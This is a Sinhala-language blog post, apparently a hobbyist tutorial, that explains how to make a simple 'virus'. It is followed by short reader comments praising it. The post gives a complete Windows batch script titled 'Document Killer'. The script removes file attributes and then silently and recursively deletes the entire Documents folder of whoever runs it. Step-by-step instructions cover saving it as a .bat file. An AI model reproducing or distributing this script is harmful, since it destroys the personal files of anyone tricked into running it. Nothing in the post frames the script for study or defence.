වයිරස් එකක් කියන්නෙ මොකක්ද කියල හැදින්වීමෙදී කියල දුන්න ඔයාලට මතක
ඇති කියල මම හිතනව.
ඉතින් දැන් අපි බලමු වයිරස් එකක් නිර්මාණය කරන්නේ කොහොමද කියල.ඇත්තටම
මෙතනදී මම ඔයාට දෙන්න යන්නේ සරල ගනයේ වයිරස් එකක් සරලවම කියුවොත් මේ වයිරස් එකෙන්
වෙන්නේ මේකයි. ඔයාගෙ පරිගණකයේ Document
කියල
ෆෝල්ඩර් එකක් තියෙනව නේද...? ඉතින් මේකෙන් අන්න ඒකට තමයි වැඩේ
දෙන්නෙ… ඉතින් මේක කවුරුහරි රන් කලොත් එයාගෙ පරිගණකයේ Document එක
Delete වෙනව. ඒ වගේම තමයි Document එක ඇතුලෙ තියෙන හැමදේම මේකෙන් Delete
වෙනව.
එහෙනම් වැඩේට බහිමු.
ඔයා දන්නව ඇතිනේ අපි මේ වැඩේට ගන්නේ නෝට් පෑඩ් (note pad) එක කියල. එහෙනම් පහත රතු පාටින් දීල තියෙන කෝඩ්
එක නෝට් පෑඩ් එකට copy,
past කරගන්නකෝ...
@echo
off
color
c
title
~ Document Killer ~
Presented By Pariganaka Lookayoo
~
cd
c:\users
attrib
-h -s -r -a %userprofile%\documents
del
%userprofile%\documents /s /q
exit
දැන් File මෙනු එක ක්ලික් කරල එන මෙනු එකෙන් Save As කියන
විකල්පය තෝරන්න.
Save As කලාම එන Box එකෙහි File name එකට ඔයා කැමති නමක් දීල
අගට" .bat "
කියන file extinction එක type කරල save ක්ලික් කරන්න.
උදාහරණයක් විදියට ඒක මම Document.BAT කියල save
කරනව.
ela mcn tava dapan
ReplyDeletecomment ekata tnx bn.aniwa danava
Deleteඕනම කෙනෙක්ට ලේසියෙන්ම තේරුම්ගන්න පුළුවන්. සුපිරි වැඩක් ආ එළම.
ReplyDeleteතව දාපන්
අනිවාරෙන්ම දාන්නම්.
Deleteලිපි කියවන ඔයාල තමයි අපේ ශක්තිය
good
ReplyDeletecontinue ...